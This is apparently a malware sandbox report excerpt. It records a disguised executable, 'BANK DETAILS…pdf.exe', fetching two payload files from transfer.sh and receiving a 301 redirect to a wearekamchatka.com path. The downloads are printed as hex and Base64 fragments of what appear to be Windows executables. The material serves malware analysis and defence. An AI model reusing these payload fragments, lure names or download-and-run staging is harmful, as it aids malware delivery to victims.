                                                Location: https://wearekamchatka.com//be4o/?M0Gdwp1p=wIp58s40YrNhfdMAFv4rqgUp5u7iL+N7b95EvKIF+kbWJuwkW3uIXI2lc43g/pQXJxrFJYwWsw==&xN9=9rHpFJex8
                                                Date: Wed, 26 Jan 2022 10:59:37 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Server: ghs
                                                Content-Length: 334
                                                X-XSS-Protection: 0
                                                X-Frame-Options: SAMEORIGIN
                                                Connection: close
                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 65 61 72 65 6b 61 6d 63 68 61 74 6b 61 2e 63 6f 6d 2f 2f 62 65 34 6f 2f 3f 4d 30 47 64 77 70 31 70 3d 77 49 70 35 38 73 34 30 59 72 4e 68 66 64 4d 41 46 76 34 72 71 67 55 70 35 75 37 69 4c 2b 4e 37 62 39 35 45 76 4b 49 46 2b 6b 62 57 4a 75 77 6b 57 33 75 49 58 49 32 6c 63 34 33 67 2f 70 51 58 4a 78 72 46 4a 59 77 57 73 77 3d 3d 26 61 6d 70 3b 78 4e 39 3d 39 72 48 70 46 4a 65 78 38 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://wearekamchatka.com//be4o/?M0Gdwp1p=wIp58s40YrNhfdMAFv4rqgUp5u7iL+N7b95EvKIF+kbWJuwkW3uIXI2lc43g/pQXJxrFJYwWsw==&amp;xN9=9rHpFJex8">here</A>.</BODY></HTML>


                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.749756144.76.136.153443C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-01-26 10:57:45 UTC0OUTGET /get/AeJsG7/RAM.txt HTTP/1.1
                                                Host: transfer.sh
                                                Connection: Keep-Alive
                                                2022-01-26 10:57:45 UTC0INHTTP/1.1 200 OK
                                                Server: nginx/1.14.2
                                                Date: Wed, 26 Jan 2022 10:57:45 GMT
                                                Content-Type: text/plain; charset=utf-8
                                                Content-Length: 223232
                                                Connection: close
                                                Content-Disposition: attachment; filename="RAM.txt"
                                                Retry-After: Wed, 26 Jan 2022 11:57:50 GMT
                                                X-Made-With: <3 by DutchCoders
                                                X-Ratelimit-Key: 127.0.0.1,84.17.52.16,84.17.52.16
                                                X-Ratelimit-Limit: 10
                                                X-Ratelimit-Rate: 600
                                                X-Ratelimit-Remaining: 9
                                                X-Ratelimit-Reset: 1643194670
                                                X-Remaining-Days: n/a
                                                X-Remaining-Downloads: n/a
                                                X-Served-By: Proudly served by DutchCoders
                                                2022-01-26 10:57:45 UTC0INData Raw: 54 56 70 46 55 75 67 41 41 41 41 41 57 49 50 6f 43 59 76 49 67 38 41 38 69 77 41 44 77 59 50 41 4b 41 4d 49 2f 2b 47 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 75 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 39 5a 6a 38 62 4f 51 64 52 53 44 6b 48 55 55 67 35 42 31 46 49 49 70 72 36 53 48 55 48 55 55 67 69 6d 73 39 49 4f 67 64 52 53 43 4b 61 7a 45 67 34 42 31 46 49 55 6d 6c 6a 61 44 6b 48 55 55 67 41 41 41 41 41 41 41 41 41 41 46 42 46 41 41 42 4d 41 51 45
                                                Data Ascii: TVpFUugAAAAAWIPoCYvIg8A8iwADwYPAKAMI/+GQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAB9Zj8bOQdRSDkHUUg5B1FIIpr6SHUHUUgims9IOgdRSCKazEg4B1FIUmljaDkHUUgAAAAAAAAAAFBFAABMAQE
                                                2022-01-26 10:57:45 UTC16INData Raw: 41 2f 77 44 2f 77 63 45 49 67 65 48 2f 41 50 38 41 43 2f 47 42 66 52 51 41 41 51 41 41 69 58 49 63 44 34 55 55 41 51 41 41 69 33 55 49 4d 39 75 4a 58 52 43 4c 65 42 67 50 74 70 51 65 42 41 6b 41 41 4d 48 69 45 49 76 50 77 66 6b 51 67 65 48 2f 41 41 41 41 69 30 79 4f 42 49 48 68 41 41 44 2f 2f 7a 50 4b 69 39 66 42 2b 67 69 42 34 76 38 41 41 41 43 4c 56 4a 59 45 67 65 49 41 41 50 38 41 77 65 45 49 4d 38 71 4c 31 38 48 36 47 49 48 69 2f 77 41 41 41 41 2b 32 56 4a 59 46 4d 38 71 4c 31 34 48 69 2f 77 41 41 41 49 74 55 6c 67 53 42 34 67 44 2f 41 41 41 7a 79 6a 4e 49 2f 49 73 51 4d 39 47 4a 53 42 79 4c 53 41 51 7a 79 6f 6c 51 49 49 74 51 43 44 50 52 69 55 67 6b 69 56 41 6f 67 2f 73 47 44 34 53 4a 41 41 41 41 69 38 72 42 2b 52 69 42 34 66 38 41 41 41 43 4c 54 49
                                                Data Ascii: A/wD/wcEIgeH/AP8AC/GBfRQAAQAAiXIcD4UUAQAAi3UIM9uJXRCLeBgPtpQeBAkAAMHiEIvPwfkQgeH/AAAAi0yOBIHhAAD//zPKi9fB+giB4v8AAACLVJYEgeIAAP8AweEIM8qL18H6GIHi/wAAAA+2VJYFM8qL14Hi/wAAAItUlgSB4gD/AAAzyjNI/IsQM9GJSByLSAQzyolQIItQCDPRiUgkiVAog/sGD4SJAAAAi8rB+RiB4f8AAACLTI
                                                2022-01-26 10:57:45 UTC32INData Raw: 4f 39 4c 4a 53 32 55 46 56 69 2b 79 4c 54 51 69 4c 67 64 67 48 41 41 43 46 77 48 51 53 67 37 68 6b 49 41 41 41 41 48 51 4a 55 65 6a 42 39 76 2f 2f 67 38 51 45 58 63 4e 2b 47 7a 67 78 79 53 70 35 61 58 4e 30 43 61 31 56 69 2b 79 42 37 4b 41 43 41 41 43 4c 52 51 79 4c 53 41 68 54 4d 39 74 57 61 50 34 42 41 41 43 4e 68 57 4c 39 2f 2f 38 7a 30 6c 4e 51 69 56 33 51 69 55 33 4d 78 30 57 6b 47 41 41 41 41 49 6c 64 71 49 6c 64 73 49 6c 64 72 49 6c 64 74 49 6c 64 75 47 61 4a 6c 57 44 39 2f 2f 2f 6f 56 6b 49 42 41 49 74 31 43 49 31 4e 7a 46 47 4e 56 61 52 53 61 41 45 45 41 41 43 4e 52 51 78 51 56 75 69 4d 49 41 45 41 67 38 51 67 68 63 41 50 69 50 67 41 41 41 43 4c 68 71 41 4c 41 41 42 58 61 50 64 65 46 4d 78 54 55 31 43 4e 66 68 78 58 78 30 58 55 58 41 42 6c 41 4d
                                                Data Ascii: O9LJS2UFVi+yLTQiLgdgHAACFwHQSg7hkIAAAAHQJUejB9v//g8QEXcN+GzgxySp5aXN0Ca1Vi+yB7KACAACLRQyLSAhTM9tWaP4BAACNhWL9//8z0lNQiV3QiU3Mx0WkGAAAAIldqIldsIldrIldtIlduGaJlWD9///oVkIBAIt1CI1NzFGNVaRSaAEEAACNRQxQVuiMIAEAg8QghcAPiPgAAACLhqALAABXaPdeFMxTU1CNfhxXx0XUXABlAM
                                                2022-01-26 10:57:45 UTC48INData Raw: 49 6d 58 6d 43 57 6f 74 4e 2b 49 74 46 2f 4d 48 4b 41 6f 76 5a 69 56 58 38 69 58 58 34 39 39 4d 6a 30 53 50 59 77 63 59 46 43 39 71 4c 56 66 51 44 38 77 4f 30 76 63 54 2b 2f 2f 2b 4a 52 66 53 4c 52 66 69 4e 74 42 61 5a 65 59 4a 61 69 31 58 38 77 63 6b 43 67 38 63 46 69 39 36 4a 58 66 69 4a 66 66 79 44 2f 78 51 50 6a 50 4c 2b 2f 2f 2b 2f 46 41 41 41 41 4d 48 47 42 59 76 61 4d 39 6b 7a 32 41 50 7a 41 37 53 39 74 50 37 2f 2f 34 74 64 39 4d 48 49 41 6f 6c 56 39 49 32 30 48 71 48 72 32 57 36 4c 58 66 69 4a 64 66 6a 42 78 67 57 4c 30 54 50 51 4d 39 4d 44 38 67 4f 30 76 62 6a 2b 2f 2f 2b 4c 56 66 53 4e 6c 42 61 68 36 39 6c 75 77 63 73 43 69 2f 41 7a 77 34 6c 4e 39 49 74 4e 2b 44 50 42 69 56 58 34 77 63 49 46 41 39 41 44 6c 4c 32 38 2f 76 2f 2f 69 30 58 30 77 63
                                                Data Ascii: ImXmCWotN+ItF/MHKAovZiVX8iXX499Mj0SPYwcYFC9qLVfQD8wO0vcT+//+JRfSLRfiNtBaZeYJai1X8wckCg8cFi96JXfiJffyD/xQPjPL+//+/FAAAAMHGBYvaM9kz2APzA7S9tP7//4td9MHIAolV9I20HqHr2W6LXfiJdfjBxgWL0TPQM9MD8gO0vbj+//+LVfSNlBah69luwcsCi/Azw4lN9ItN+DPBiVX4wcIFA9ADlL28/v//i0X0wc
                                                2022-01-26 10:57:45 UTC64INData Raw: 41 44 35 58 42 69 59 62 6f 42 77 41 41 58 6f 76 42 69 2b 56 64 77 38 2f 38 79 64 66 33 56 59 76 73 67 65 78 55 41 67 41 41 56 6a 50 41 61 41 59 43 41 41 42 51 6a 59 32 75 2f 66 2f 2f 55 57 61 4a 68 61 7a 39 2f 2f 2f 6f 6d 2b 49 41 41 4f 6a 31 46 51 45 41 55 4f 67 67 36 41 41 41 69 33 55 49 67 38 51 51 69 59 62 59 50 67 41 41 36 4f 72 35 41 41 43 4c 51 41 4f 46 77 41 2b 45 6a 77 49 41 41 44 32 49 69 49 69 49 44 34 53 45 41 67 41 41 56 32 6f 2f 56 6f 6d 47 32 41 63 41 41 49 32 2b 6c 41 77 41 41 4f 69 6b 66 67 41 41 69 35 61 6b 44 41 41 41 55 47 6f 41 61 67 42 53 56 2b 68 53 66 77 41 41 61 6b 42 57 69 59 61 77 44 41 41 41 36 49 52 2b 41 41 42 51 69 34 61 6b 44 41 41 41 61 67 42 71 41 46 42 58 36 44 4a 2f 41 41 42 71 52 46 61 4a 68 72 51 4d 41 41 44 6f 5a 48
                                                Data Ascii: AD5XBiYboBwAAXovBi+Vdw8/8ydf3VYvsgexUAgAAVjPAaAYCAABQjY2u/f//UWaJhaz9///om+IAAOj1FQEAUOgg6AAAi3UIg8QQiYbYPgAA6Or5AACLQAOFwA+EjwIAAD2IiIiID4SEAgAAV2o/VomG2AcAAI2+lAwAAOikfgAAi5akDAAAUGoAagBSV+hSfwAAakBWiYawDAAA6IR+AABQi4akDAAAagBqAFBX6DJ/AABqRFaJhrQMAADoZH
                                                2022-01-26 10:57:45 UTC80INData Raw: 64 77 77 56 59 32 39 52 56 69 2b 78 57 69 33 55 49 56 75 67 7a 74 51 41 41 41 38 42 51 56 75 68 71 73 67 41 41 69 30 55 4d 61 67 42 51 56 75 69 4f 74 67 41 41 56 75 67 59 74 51 41 41 67 38 51 63 5a 6f 4e 38 52 76 35 63 64 42 4a 57 36 41 65 31 41 41 43 35 58 41 41 41 41 49 50 45 42 47 61 4a 44 45 5a 57 36 50 57 30 41 41 43 36 4b 67 41 41 41 49 50 45 42 47 61 4a 46 45 5a 65 58 63 4f 50 32 45 41 71 4e 53 31 56 69 2b 78 57 69 33 55 49 56 31 62 6f 30 72 51 41 41 41 50 41 55 46 62 6f 43 62 49 41 41 49 74 46 44 47 6f 41 55 46 62 6f 4c 62 59 41 41 46 62 6f 74 37 51 41 41 49 74 39 45 49 50 45 48 47 61 44 66 45 62 2b 58 48 51 59 5a 6f 4d 2f 58 48 51 53 56 75 69 64 74 41 41 41 75 56 77 41 41 41 43 44 78 41 52 6d 69 51 78 47 61 67 42 58 56 75 6a 34 74 51 41 41 67 38
                                                Data Ascii: dwwVY29RVi+xWi3UIVugztQAAA8BQVuhqsgAAi0UMagBQVuiOtgAAVugYtQAAg8QcZoN8Rv5cdBJW6Ae1AAC5XAAAAIPEBGaJDEZW6PW0AAC6KgAAAIPEBGaJFEZeXcOP2EAqNS1Vi+xWi3UIV1bo0rQAAAPAUFboCbIAAItFDGoAUFboLbYAAFbot7QAAIt9EIPEHGaDfEb+XHQYZoM/XHQSVuidtAAAuVwAAACDxARmiQxGagBXVuj4tQAAg8
                                                2022-01-26 10:57:45 UTC96INData Raw: 31 42 6c 39 65 69 2b 56 64 77 31 2b 34 41 51 41 41 41 46 36 4c 35 56 33 44 61 4c 34 71 56 59 76 73 67 2b 77 77 4d 38 42 57 69 33 55 4d 78 6b 58 77 41 49 6c 46 38 59 6c 46 39 59 6c 46 2b 57 61 4a 52 66 32 49 52 66 39 6d 69 55 58 51 69 55 58 53 69 55 58 57 69 55 58 61 69 55 58 65 69 55 58 69 69 55 58 6d 69 55 58 71 5a 6f 6c 46 37 6f 58 32 44 34 54 4c 41 41 41 41 69 30 59 49 67 2f 67 43 64 54 34 50 74 31 59 51 69 33 55 49 6a 55 33 77 55 57 6f 49 61 67 42 53 6a 55 59 63 55 4f 67 4b 68 41 41 41 6a 55 33 77 55 59 31 56 30 46 4c 6f 76 59 67 41 41 49 75 4f 42 41 6f 41 41 47 6f 41 6a 55 58 51 55 46 48 6f 47 34 59 41 41 49 31 56 30 46 4c 72 51 49 50 34 42 48 56 51 69 30 34 51 69 33 55 49 6a 55 58 77 55 47 6f 49 61 67 42 52 6a 56 59 63 55 75 6a 49 67 77 41 41 6a 55
                                                Data Ascii: 1Bl9ei+Vdw1+4AQAAAF6L5V3DaL4qVYvsg+wwM8BWi3UMxkXwAIlF8YlF9YlF+WaJRf2IRf9miUXQiUXSiUXWiUXaiUXeiUXiiUXmiUXqZolF7oX2D4TLAAAAi0YIg/gCdT4Pt1YQi3UIjU3wUWoIagBSjUYcUOgKhAAAjU3wUY1V0FLovYgAAIuOBAoAAGoAjUXQUFHoG4YAAI1V0FLrQIP4BHVQi04Qi3UIjUXwUGoIagBRjVYcUujIgwAAjU
                                                2022-01-26 10:57:45 UTC112INData Raw: 37 57 54 34 50 66 43 5a 7a 79 78 42 2f 66 52 73 65 51 6d 70 69 59 77 30 69 79 72 70 2b 73 75 44 4f 6d 55 50 54 51 4c 57 49 4d 38 30 57 6b 39 4b 68 67 34 57 56 33 58 77 6b 6a 4c 72 6c 6d 32 4a 62 35 58 43 6d 35 39 52 70 4a 6c 50 6d 2f 4b 49 57 77 38 46 51 6c 4b 41 36 30 34 68 61 65 73 34 62 6a 79 37 2f 5a 42 4f 67 30 2f 4d 5a 62 7a 44 52 6d 32 64 38 59 39 64 56 51 61 41 72 48 54 72 37 53 79 35 76 50 2b 57 58 53 38 74 4a 47 35 77 79 6e 51 74 48 35 4b 79 65 6b 53 77 6a 4a 38 6e 30 79 2f 33 45 48 2b 6b 57 64 76 4a 58 4f 57 68 61 6a 6e 53 58 75 71 6c 59 59 44 49 74 45 49 38 51 71 61 31 45 43 63 52 50 58 76 6a 41 72 47 54 35 42 43 38 5a 71 6e 59 59 4b 7a 4c 75 6f 4e 4c 36 6d 57 48 4f 52 35 6c 66 4d 52 36 75 41 59 79 61 76 79 6c 4d 6a 4a 2f 75 2b 54 2b 2b 65 2f
                                                Data Ascii: 7WT4PfCZzyxB/fRseQmpiYw0iyrp+suDOmUPTQLWIM80Wk9Khg4WV3XwkjLrlm2Jb5XCm59RpJlPm/KIWw8FQlKA604haes4bjy7/ZBOg0/MZbzDRm2d8Y9dVQaArHTr7Sy5vP+WXS8tJG5wynQtH5KyekSwjJ8n0y/3EH+kWdvJXOWhajnSXuqlYYDItEI8Qqa1ECcRPXvjArGT5BC8ZqnYYKzLuoNL6mWHOR5lfMR6uAYyavylMjJ/u+T++e/
                                                2022-01-26 10:57:45 UTC128INData Raw: 4e 54 77 47 4e 56 78 4a 52 78 30 58 63 49 77 41 41 41 49 6c 56 32 4f 68 41 49 67 41 41 61 67 53 4e 56 64 68 53 6a 55 63 47 55 4f 67 78 49 67 41 41 61 67 53 4e 52 68 52 51 6a 55 38 4d 55 63 5a 48 43 2b 72 6f 48 69 49 41 41 49 74 56 2f 46 4a 6d 78 30 63 51 4d 77 42 54 78 30 59 51 41 51 41 41 41 4f 6a 6e 49 51 41 41 67 38 51 73 58 31 35 62 69 2b 56 64 77 77 42 68 51 4d 6b 73 76 4e 5a 59 31 51 52 31 56 59 70 56 69 2b 79 4c 52 51 69 4c 53 42 42 57 61 67 64 71 41 46 47 4e 73 4c 77 4c 41 41 42 57 55 4f 6a 30 45 67 41 41 69 31 55 59 69 30 55 55 69 30 30 51 67 38 51 55 55 6f 74 56 44 46 43 4c 42 6c 46 53 2f 39 42 65 58 63 4d 64 77 75 61 74 63 63 37 6f 64 2b 55 37 56 59 76 73 69 30 55 49 69 30 67 51 56 6d 6f 49 61 67 42 52 6a 62 44 41 43 77 41 41 56 6c 44 6f 74 42
                                                Data Ascii: NTwGNVxJRx0XcIwAAAIlV2OhAIgAAagSNVdhSjUcGUOgxIgAAagSNRhRQjU8MUcZHC+roHiIAAItV/FJmx0cQMwBTx0YQAQAAAOjnIQAAg8QsX15bi+VdwwBhQMksvNZY1QR1VYpVi+yLRQiLSBBWagdqAFGNsLwLAABWUOj0EgAAi1UYi0UUi00Qg8QUUotVDFCLBlFS/9BeXcMdwuatcc7od+U7VYvsi0UIi0gQVmoIagBRjbDACwAAVlDotB
                                                2022-01-26 10:57:45 UTC144INData Raw: 2f 2f 35 46 38 45 45 48 48 68 55 6a 34 2f 2f 38 4c 57 56 64 6a 78 34 56 4d 2b 50 2f 2f 69 72 58 71 48 63 65 46 55 50 6a 2f 2f 33 6d 73 43 50 66 48 68 56 54 34 2f 2f 38 49 34 36 31 7a 78 34 56 59 2b 50 2f 2f 78 68 35 6c 6f 63 65 46 58 50 6a 2f 2f 2b 63 47 50 63 72 48 68 57 44 34 2f 2f 2f 45 4a 74 49 36 78 34 56 6b 2b 50 2f 2f 43 44 50 38 73 73 65 46 61 50 6a 2f 2f 38 38 47 56 57 47 49 6a 57 7a 34 2f 2f 2f 6f 61 2f 4c 2f 2f 34 50 45 44 49 32 46 34 50 66 2f 2f 34 58 32 64 41 70 4f 44 37 59 49 6a 55 51 49 41 58 58 32 6a 58 41 42 44 37 59 41 6a 56 58 67 55 6c 42 57 36 45 50 72 2f 76 38 7a 77 49 50 45 44 44 67 47 64 41 64 41 67 44 77 47 41 48 58 35 69 31 30 49 51 46 42 57 55 2b 69 6e 38 66 2f 2f 67 38 51 4d 4d 2f 2b 41 4f 77 42 30 42 30 65 41 50 42 38 41 64 66
                                                Data Ascii: //5F8EEHHhUj4//8LWVdjx4VM+P//irXqHceFUPj//3msCPfHhVT4//8I461zx4VY+P//xh5loceFXPj//+cGPcrHhWD4///EJtI6x4Vk+P//CDP8sseFaPj//88GVWGIjWz4///oa/L//4PEDI2F4Pf//4X2dApOD7YIjUQIAXX2jXABD7YAjVXgUlBW6EPr/v8zwIPEDDgGdAdAgDwGAHX5i10IQFBWU+in8f//g8QMM/+AOwB0B0eAPB8Adf
                                                2022-01-26 10:57:45 UTC160INData Raw: 71 4f 58 42 32 4d 73 38 50 77 36 65 4d 4e 77 78 70 4a 56 37 5a 51 67 4c 57 2f 78 51 50 4f 6c 38 37 53 44 70 78 72 2f 44 47 77 67 43 7a 53 78 31 68 74 69 45 46 68 34 2f 73 2b 30 69 30 78 74 76 6a 65 34 41 6c 57 6b 57 33 4f 77 59 49 31 47 7a 36 62 50 61 4f 33 31 4d 49 47 37 55 65 49 33 2f 78 77 32 32 78 7a 6d 6e 78 65 30 39 77 74 6e 45 77 49 55 42 6d 71 34 52 6f 70 5a 77 4c 41 63 6b 37 6f 65 72 55 31 46 6f 6f 64 41 62 35 35 35 75 32 6d 38 4e 65 67 6a 4f 44 6c 4b 38 64 30 56 76 76 75 4b 75 49 6c 45 43 44 78 78 6f 55 74 6b 43 38 2f 55 6e 51 59 4f 31 31 4a 53 65 57 37 4f 32 65 4e 4c 77 45 54 44 55 50 43 47 51 45 2b 73 6b 35 67 61 6f 5a 32 38 36 37 76 54 56 66 59 6b 61 51 4d 7a 4b 31 46 59 52 31 67 6d 37 54 6b 34 7a 57 78 61 77 5a 41 50 43 2b 6c 30 30 50 76 58
                                                Data Ascii: qOXB2Ms8Pw6eMNwxpJV7ZQgLW/xQPOl87SDpxr/DGwgCzSx1htiEFh4/s+0i0xtvje4AlWkW3OwYI1Gz6bPaO31MIG7UeI3/xw22xzmnxe09wtnEwIUBmq4RopZwLAck7oerU1FoodAb555u2m8NegjODlK8d0VvvuKuIlECDxxoUtkC8/UnQYO11JSeW7O2eNLwETDUPCGQE+sk5gaoZ2867vTVfYkaQMzK1FYR1gm7Tk4zWxawZAPC+l00PvX
                                                2022-01-26 10:57:45 UTC176INData Raw: 50 4f 4f 46 59 54 4c 2b 63 5a 2f 41 71 5a 58 70 6a 64 4a 35 65 57 75 77 49 6a 6e 6c 34 6a 57 56 35 5a 6a 37 4b 32 38 59 39 55 35 4c 42 66 6a 6c 65 75 30 77 52 70 43 78 35 33 5a 6e 55 31 63 6f 33 50 4e 42 4d 46 4a 65 78 48 7a 7a 69 67 70 67 76 69 77 65 61 65 46 63 7a 55 52 42 30 6b 69 46 73 58 58 41 62 66 59 73 65 6b 4f 47 76 55 44 4d 42 6b 4a 57 57 32 54 6a 33 56 62 34 56 58 2f 49 34 74 7a 41 38 74 36 6a 36 64 4c 37 4b 2b 64 70 47 30 34 64 78 74 49 4e 6f 63 62 35 44 6c 46 70 2f 75 43 30 35 4f 37 59 46 77 66 56 55 67 51 53 6f 51 43 59 7a 63 4b 30 30 71 35 37 32 4a 63 76 77 64 72 7a 6e 51 4e 44 59 75 71 72 6f 70 53 78 76 58 35 49 35 2f 68 76 4d 70 43 77 4d 2b 4f 74 79 72 2f 38 38 54 52 58 4e 35 52 4e 4d 65 52 58 31 7a 5a 6e 4b 7a 53 42 75 70 36 54 50 38 68
                                                Data Ascii: POOFYTL+cZ/AqZXpjdJ5eWuwIjnl4jWV5Zj7K28Y9U5LBfjleu0wRpCx53ZnU1co3PNBMFJexHzzigpgviweaeFczURB0kiFsXXAbfYsekOGvUDMBkJWW2Tj3Vb4VX/I4tzA8t6j6dL7K+dpG04dxtINocb5DlFp/uC05O7YFwfVUgQSoQCYzcK00q572JcvwdrznQNDYuqropSxvX5I5/hvMpCwM+Otyr/88TRXN5RNMeRX1zZnKzSBup6TP8h
                                                2022-01-26 10:57:45 UTC192INData Raw: 79 66 79 54 57 6c 50 49 4e 36 65 43 66 32 36 35 38 79 44 55 2f 48 4c 51 36 48 70 32 2b 73 4a 63 47 43 47 43 76 62 76 76 4d 46 63 63 50 33 62 44 56 54 4d 4a 73 47 36 4f 63 4c 6a 6a 32 4b 78 6f 71 37 7a 71 30 4a 43 6b 68 42 65 55 34 43 48 44 53 77 6c 75 49 44 7a 2f 6b 4f 67 48 51 58 79 45 74 71 35 76 32 65 34 75 6c 38 66 72 7a 72 4d 4f 57 4c 64 77 38 53 77 64 4d 4d 31 39 4f 67 45 4c 47 77 45 36 38 34 44 31 63 54 55 64 6b 48 65 4a 43 62 6e 48 6e 45 6f 4e 45 39 6b 53 4e 70 4f 44 62 58 63 56 39 62 74 51 53 59 4c 70 78 51 57 2f 7a 77 6d 35 4b 63 67 79 34 38 6a 7a 44 71 47 65 79 67 4a 6f 38 61 56 73 53 53 4b 61 79 54 59 58 50 66 58 6a 70 62 31 71 4c 2b 65 43 76 33 50 4d 76 4b 5a 33 79 48 77 39 34 42 56 31 59 74 4c 79 63 78 4f 58 49 58 5a 45 4b 6f 48 62 6b 2b 69
                                                Data Ascii: yfyTWlPIN6eCf2658yDU/HLQ6Hp2+sJcGCGCvbvvMFccP3bDVTMJsG6OcLjj2Kxoq7zq0JCkhBeU4CHDSwluIDz/kOgHQXyEtq5v2e4ul8frzrMOWLdw8SwdMM19OgELGwE684D1cTUdkHeJCbnHnEoNE9kSNpODbXcV9btQSYLpxQW/zwm5Kcgy48jzDqGeygJo8aVsSSKayTYXPfXjpb1qL+eCv3PMvKZ3yHw94BV1YtLycxOXIXZEKoHbk+i
                                                2022-01-26 10:57:45 UTC208INData Raw: 7a 72 50 35 55 57 55 5a 32 59 58 45 2f 74 74 2b 2f 4e 6b 61 6e 46 58 76 54 4a 55 48 73 74 45 32 6f 76 31 33 46 58 72 5a 52 48 6a 6b 4d 64 65 37 30 53 49 52 49 52 62 2b 69 65 63 46 50 53 57 63 45 54 51 57 4d 48 34 68 69 54 47 76 6a 2b 57 6a 41 42 78 6a 32 74 2f 34 76 45 2b 44 4f 69 72 6d 5a 53 37 4c 56 6d 52 62 67 6a 4f 4b 47 73 48 58 34 71 74 76 46 47 34 30 71 68 6a 4d 67 6f 67 63 4c 46 41 64 59 44 75 38 34 71 52 35 44 65 52 7a 6a 36 59 6c 67 34 6b 66 69 30 4d 36 57 46 42 52 77 7a 48 63 77 72 6c 4e 38 68 39 78 53 42 37 56 75 55 6c 59 79 41 41 65 4c 36 57 66 68 58 4d 48 50 50 69 2b 73 31 50 47 47 34 53 57 4b 50 57 70 72 37 47 71 41 6e 4c 6b 76 68 43 34 72 43 70 58 46 62 65 6b 73 77 41 56 4b 74 4b 45 36 30 37 6a 36 44 6c 67 64 62 77 37 58 4f 75 34 6b 50 43
                                                Data Ascii: zrP5UWUZ2YXE/tt+/NkanFXvTJUHstE2ov13FXrZRHjkMde70SIRIRb+iecFPSWcETQWMH4hiTGvj+WjABxj2t/4vE+DOirmZS7LVmRbgjOKGsHX4qtvFG40qhjMgogcLFAdYDu84qR5DeRzj6Ylg4kfi0M6WFBRwzHcwrlN8h9xSB7VuUlYyAAeL6WfhXMHPPi+s1PGG4SWKPWpr7GqAnLkvhC4rCpXFbekswAVKtKE607j6Dlgdbw7XOu4kPC


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.749757144.76.136.153443C:\Users\user\Desktop\BANK DETAILS-25012022-971332pdf.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-01-26 10:57:45 UTC218OUTGET /get/y4hP6y/DLLLLLLLL.txt HTTP/1.1
                                                Host: transfer.sh
                                                2022-01-26 10:57:46 UTC218INHTTP/1.1 200 OK
                                                Server: nginx/1.14.2
                                                Date: Wed, 26 Jan 2022 10:57:46 GMT
                                                Content-Type: text/plain; charset=utf-8
                                                Content-Length: 86700
                                                Connection: close
                                                Content-Disposition: attachment; filename="DLLLLLLLL.txt"
                                                Retry-After: Wed, 26 Jan 2022 11:57:50 GMT
                                                X-Made-With: <3 by DutchCoders
                                                X-Ratelimit-Key: 127.0.0.1,84.17.52.16,84.17.52.16
                                                X-Ratelimit-Limit: 10
                                                X-Ratelimit-Rate: 600
                                                X-Ratelimit-Remaining: 8
                                                X-Ratelimit-Reset: 1643194670
                                                X-Remaining-Days: n/a
                                                X-Remaining-Downloads: n/a
                                                X-Served-By: Proudly served by DutchCoders
                                                2022-01-26 10:57:46 UTC219INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4a 2f 72 77 74 51 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 56 41 41 41 50 59 41 41 41 41 47 41 41 41 41 41 41 41 41 37 68 51 42 41 41 41 67 41 41 41 41 49 41 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
